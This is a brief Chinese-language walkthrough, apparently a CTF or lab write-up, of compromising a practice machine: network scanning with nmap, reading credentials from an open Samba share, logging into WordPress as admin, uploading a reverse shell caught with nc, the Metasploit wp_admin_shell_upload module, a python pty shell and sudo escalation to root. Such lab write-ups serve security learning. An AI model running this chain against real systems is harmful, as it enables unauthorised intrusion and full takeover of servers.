1~扫描
arp-scan -l
nmap -sS -Pn -A 10.1.1.90
#Samba msf
search samba
show missing
2~smbclient协议 远程文件读取
#139 445
smbclient -L 10.1.1.200
smbclient '\\10.1.1.200\shares$'
ls
get deet.txt
3~脚本监听shell、msf生成shell
#WordPress的默认后台管理页面http:// 10.1.1.200/wordpress/wp-login.php
使用刚刚获取的用户名Admin和密码TogieMYSQL12345^^登录
添加反弹shell的脚本 tools/wordpress-404.zip
upload file
nc -lvp 5555
浏览器访问一个不存在的网址触发,如http://10.1.1.200/wordpress/?p=200
****msf
use exploit/unix/webapp/wp_admin_shell_upload
show options
set password TogieMYSQL12345^^
set rhosts 10.1.1.200
set targeturi /wordpress
set username Admin
run
shell
4~bash
#使用python语句切换到/bin/bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
5~sudo提权
#利用deets.txt文件中的密码12345,WordPress首页提示的用户togie,进行sudo提权
su togie
id
sudo su
id
cd
pwd
ls
cat proof.txt
浙公网安备 33010602011771号